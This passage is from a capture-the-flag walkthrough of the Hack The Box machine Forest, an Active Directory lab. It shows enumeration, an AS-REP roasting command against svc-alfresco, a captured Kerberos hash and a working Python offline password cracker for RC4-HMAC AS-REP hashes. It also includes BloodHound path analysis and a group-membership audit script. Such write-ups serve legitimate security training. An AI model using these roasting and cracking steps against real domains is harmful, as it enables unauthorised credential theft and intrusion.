From the above figure, we can see that svc-alfresco is a member of the group Service Accounts, which is a member of the group Privileged IT Accounts, which in turn is a member of Account Operators. Nested membership is transitive, so svc-alfresco effectively holds Account Operators rights even though it is not a direct member.

The full list of OSCP-like machines compiled by TJNull can be found here.
Let's get started.

Reconnaissance

Run the nmapAutomator script to enumerate open ports and the services running on them. nmap 7.80 could not fingerprint the version of the service on port 53/tcp (DNS) and printed an unidentified-service fingerprint for it, but the service info line is useful on its own: Service Info: Host: FOREST; OS: Windows; CPE: cpe:o:microsoft:windows.

Since the Kerberos and LDAP services are running, chances are we're dealing with a Windows Active Directory box. The nmap scan leaks the domain and hostname: htb.local and FOREST.htb.local. Similarly, the SMB OS discovery script output leaks the operating system: Windows Server 2016 Standard 14393. If we find credentials through SMB or LDAP, we can use these services to remotely connect to the box.

If you would like to see how to do this manually, refer to the Lightweight writeup.

Notice that the output does leak first names, last names and addresses, but they are written in DTMF map format, which maps letters to their corresponding digits on the telephone keypad. However, before I start writing a script to convert the numbers to letters, I'm going to enumerate other ports to see if I can get names from there.

We'll run enum4linux, a tool for enumerating information from Windows and Samba systems. It's a wrapper around the Samba tools smbclient, rpcclient, net and nmblookup.

If Kerberos pre-authentication is disabled on any of the accounts found above, we can use the impacket script GetNPUsers.py to send an AS-REQ for that user without proving knowledge of the password. The Key Distribution Center (KDC) answers with an AS-REP whose encrypted part is encrypted with a key derived from the user's password (loosely, "a TGT encrypted with the user's password"). We can take that encrypted blob offline, run it through a password cracker and brute-force the user's password; the KDC never sees the guesses, so the domain lockout policy does not apply.
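What the password cracker actually does with an AS-REP hash, as an added example (my own code, not the writeup's). It implements the RC4-HMAC (etype 23) check from RFC 4757: the Kerberos key is the NT hash (MD4 of the UTF-16LE password), K1 = HMAC-MD5(key, T=8), K3 = HMAC-MD5(K1, checksum), the ciphertext is RC4-decrypted with K3, and a guess is correct when HMAC-MD5(K1, plaintext) equals the checksum. The hash string format `$krb5asrep$23$user@REALM:checksum$ciphertext` is the one impacket emits and John/hashcat consume. The sample password, confounder and plaintext below are constructed for the demo (the real Forest hash is not cracked here); MD4 is implemented in pure Python because OpenSSL 3 builds often disable it. AES etypes (17/18) use a different key derivation and are deliberately rejected.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
T_AS_REP = 8  # RFC 4757 key-usage value for the AS-REP encrypted part


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(48):
            if i < 16:
                t, k, s = f(b, c, d), i, (3, 7, 11, 19)[i % 4]
            elif i < 32:
                t, k, s = g(b, c, d) + 0x5A827999, r2[i - 16], (3, 5, 9, 13)[i % 4]
            else:
                t, k, s = h(b, c, d) + 0x6ED9EBA1, r3[i - 32], (3, 9, 11, 15)[i % 4]
            a, b, c, d = d, rotl((a + t + x[k]) & MASK32, s), b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (encrypt and decrypt are the same operation)."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_key(password: str) -> bytes:
    """RFC 4757: the RC4-HMAC Kerberos key is MD4(UTF-16LE(password)), i.e. the NT hash."""
    return md4(password.encode("utf-16-le"))


def _k1(password: str) -> bytes:
    return hmac.new(rc4_hmac_key(password), struct.pack("<I", T_AS_REP), hashlib.md5).digest()


def asrep_encrypt(password: str, plaintext: bytes, confounder: bytes):
    """KDC side: produce (checksum, ciphertext) for the AS-REP encrypted part."""
    k1 = _k1(password)
    cksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    return cksum, rc4(k3, confounder + plaintext)


def password_matches(password: str, cksum: bytes, edata: bytes) -> bool:
    """Cracker side: decrypt with the candidate's key and verify the checksum."""
    k1 = _k1(password)
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    plain = rc4(k3, edata)
    return hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), cksum)


def format_asrep_hash(principal: str, cksum: bytes, edata: bytes) -> str:
    return "$krb5asrep$23$%s:%s$%s" % (principal, cksum.hex(), edata.hex())


def parse_asrep_hash(line: str):
    prefix = "$krb5asrep$23$"
    if not line.startswith(prefix):
        raise ValueError("only etype 23 (RC4-HMAC) AS-REP hashes are handled; AES etypes need a different KDF")
    principal, rest = line[len(prefix):].split(":", 1)
    cksum_hex, edata_hex = rest.split("$", 1)
    return principal, bytes.fromhex(cksum_hex), bytes.fromhex(edata_hex)


def crack_asrep(line: str, wordlist):
    """Return (principal, password) or (principal, None) if no candidate matches."""
    principal, cksum, edata = parse_asrep_hash(line)
    for candidate in wordlist:
        if password_matches(candidate, cksum, edata):
            return principal, candidate
    return principal, None


# Constructed sample (not the real Forest hash): the real encrypted part is a DER-encoded
# EncASRepPart, but any bytes exercise the mechanics. Password and confounder are made up.
SAMPLE_PASSWORD = "Winter2019!"
SAMPLE_HASH = format_asrep_hash(
    "svc-alfresco@HTB",
    *asrep_encrypt(SAMPLE_PASSWORD, b"constructed EncASRepPart stand-in", bytes(range(1, 9))))
SAMPLE_WORDLIST = ["password", "Summer2019!", "Winter2019!", "s3rv1ce"]

if __name__ == "__main__":
    print(SAMPLE_HASH)
    print(crack_asrep(SAMPLE_HASH, SAMPLE_WORDLIST))
```

The per-guess cost is one MD4 and three HMAC-MD5 plus an RC4 pass, which is why RC4 AS-REP roasting cracks so quickly compared with the PBKDF2-based AES etypes; disabling RC4 on the domain, or re-enabling pre-authentication, is the fix on the defender side.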
When I first did this box, I assumed the impacket script requires a username as a parameter, so I ran it against every username I had found. It turns out the script can output both the vulnerable usernames and their corresponding encrypted AS-REP blobs in one run (note the trailing slash after the domain, which impacket's domain/user syntax requires):

`GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -request`

We get back the following result: Kerberos pre-authentication is disabled for the user svc-alfresco, and the KDC gave us back an AS-REP encrypted with a key derived with the user's password. Save the hash in the file hash.txt.

`cat hash.txt`
$krb5asrep$23$svc-alfresco@HTB:4ca6507622ec86fa1a1c8e6ed6c9070f$670b846a8ba6ee243b9cad85657328fdf5624df615750cf3eeaa364b04ae9225ecaff4cf8994bb71fd4c07c9d406c6c30b1a1f899bde7bb9eb4df3e83fa07fc4405994a1bbd7a9fb6105342f78e5ca1ae8797b136f1eaecebd11eefeec83062b0142081208ef51cc17cbecf1fa7a88fad24aee856a539668fb3b9eae917cb6efb57df72a533f893c715bb0216f63c6df345e66fe66777ecfe98c8b516c905d4a81c7e6a4b5d3a3779ddf1ccad98e062f9bfc40596b24bd7685892f4ce22d44dcbf9aa2594748f81e2b7cc369390fab61d8cc7e5eeb2b987e4e52c9fab5f9a184

(The `$krb5asrep$23$` prefix marks etype 23, RC4-HMAC, and the first 32 hex characters before the `$` are the 16-byte checksum; John and hashcat both expect this layout.) Crack the password using John the Ripper. With the cracked credentials we can log in to the box remotely; this is only possible because the WinRM and WSMan services are open (refer to the nmap scan).

Let's run BloodHound to see if there are any exploitable paths. First, download SharpHound.exe and set up a Python web server in the directory it resides in, so the collector can be fetched onto the target. If you don't have BloodHound installed on your machine, use the following command to install it. In the Queries tab, select the pre-built query Shortest Paths from Owned Principals.
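The chain the BloodHound query surfaces (svc-alfresco in Service Accounts, in Privileged IT Accounts, in Account Operators) is a graph walk over MemberOf edges. As an added example, not code from the writeup or from BloodHound, the block below does that walk over a membership map constructed from the group names the writeup reports; in practice the map would come from an LDAP memberOf dump or SharpHound's JSON, and BloodHound also follows ACL, session and admin edges that are omitted here. The user "andy" and the group "Domain Users" are constructed decoys, and all function names are my own.

```python
from collections import deque

# Constructed direct-membership map (principal -> groups it is directly in).
# Mirrors the chain described in the writeup; "andy"/"Domain Users" are decoys.
MEMBER_OF = {
    "svc-alfresco": ["Service Accounts"],
    "Service Accounts": ["Privileged IT Accounts"],
    "Privileged IT Accounts": ["Account Operators"],
    "Account Operators": [],
    "andy": ["Domain Users"],
    "Domain Users": [],
}

# Built-in groups whose membership is effectively privileged in AD.
SENSITIVE_GROUPS = {"Account Operators", "Domain Admins", "Enterprise Admins", "Administrators"}


def effective_groups(principal, member_of):
    """Transitive closure of membership: every group `principal` is in, directly or via nesting."""
    seen, stack = set(), list(member_of.get(principal, []))
    while stack:
        group = stack.pop()
        if group not in seen:
            seen.add(group)
            stack.extend(member_of.get(group, []))
    return seen


def shortest_path(start, target, member_of):
    """BFS over MemberOf edges; returns [start, ..., target] or None if unreachable."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for group in member_of.get(node, []):
            if group not in prev:
                prev[group] = node
                queue.append(group)
    return None


def users(member_of):
    """Nodes that never appear as a membership target are users (or empty groups)."""
    targets = {g for groups in member_of.values() for g in groups}
    return [p for p in member_of if p not in targets]


def principals_with_sensitive_rights(member_of, sensitive=SENSITIVE_GROUPS):
    """Map each user to the sensitive groups it reaches transitively (the defender's sweep)."""
    result = {}
    for user in users(member_of):
        hits = sorted(effective_groups(user, member_of) & sensitive)
        if hits:
            result[user] = hits
    return result


if __name__ == "__main__":
    print(" -> ".join(shortest_path("svc-alfresco", "Account Operators", MEMBER_OF)))
    print(principals_with_sensitive_rights(MEMBER_OF))
```

The sweep function is the part worth keeping: a direct-membership check of Account Operators would report nobody, while the transitive check reports svc-alfresco, which is exactly why nested service-account groups under built-in operator groups are worth auditing.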